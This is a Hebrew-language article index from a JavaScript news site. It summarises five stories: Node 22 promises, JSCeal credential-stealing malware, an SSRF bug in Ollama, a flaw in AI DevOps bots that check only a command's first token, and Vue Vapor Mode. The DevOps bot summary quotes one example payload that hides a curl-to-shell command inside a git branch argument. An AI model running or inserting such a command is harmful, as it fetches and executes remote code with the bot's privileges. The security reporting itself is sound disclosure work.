GyaanSetu JavaScript

האקוסיסטם של JavaScript ו-TypeScript.

100 articlesDeep, practical knowledge

Promise.withResolvers של Node 22 מקצץ בחצי את לולאות כלי Claude

על ידי החלפת תבנית ה-`new Promise` המסורבלת בקריאה אחת של `Promise.withResolvers()`, מפתחים יכולים להעביר פונקציות resolve/reject לכל חלק במערכת, ובכך למנוע resolve שנשכחו, אזהרות double-reject וקינון עמוק (deep nesting) – דבר בעל ערך רב במיוחד בסביבות Lambda serverless.

JavaScript · 4 min read

נוזקת JSCeal גונבת טוקני OAuth של Chrome ומנטרלת את ה-MFA של גוגל עבור סוחרי קריפטו

מטען ה-JSCeal, הפועל ב-RAM בלבד, מחלץ עוגיות (cookies), סיסמאות שמורות וטוקני OAuth מדפדפני Chromium, ולאחר מכן משחזר את הסשנים כדי לעקוף את בקשת האימות הדו-שלבי של גוגל, מה שמאפשר לתוקפים להשתלט על כספים ב-Binance, Bybit, Ledger ועוד.

JavaScript · 2 min read

מוריד המודלים של Ollama מאפשר לתוקפים ללא אימות להשיג מטא-דאטה של ענן באמצעות SSRF

באג ה-SSRF נותר בעינו בגרסה 0.33.2 של Ollama מכיוון שמוריד מודל ה-tensor משתמש בלקוח HTTP נפרד שמתעלם ממנגנון הגנת ההפניה (redirect guard) שנוסף עבור CVE-2026-5530, מה שמאפשר לתוקפים להפנות הורדות לכל כתובת נגישה.

JavaScript · 3 min read

חשיפת בוטים של DevOps מבוססי AI: רשימות לבנות של קידומות מאפשרות לתוקפים להריץ קוד שרירותי

CVE-2026-22708 מדגים כי סוכנים הבודקים רק את הטוקן הראשון של פקודה עלולים להוטעות על ידי מטעים (payloads) המוסתרים בתוך ארגומנטים — למשל, git branch "$(curl evil.sh|sh)" — מה שמעניק לתוקפים את אותן ההרשאות שיש לבוט האוטומציה.

JavaScript · 4 min read

Vapor Mode של Vue 3.6 מוותר על ה-Virtual DOM ומשפר את ביצועי המשחקים

ה-Vapor Mode הקרוב של Vue 3.6 מקמפל רכיבי קובץ יחיד (single-file components) לקריאות DOM ישירות, ובכך מבטל את שלב ה-diff של ה-virtual-DOM. במשחקי בדיקה המתרעננים עשרות פעמים בשנייה, השינוי מקצר את זמן הרינדור ומקטין את גודל ה-bundles, אם כי בממשקי משתמש בעלי תדירות נמוכה ניתן לראות שיפור מועט בלבד.

JavaScript · 4 min read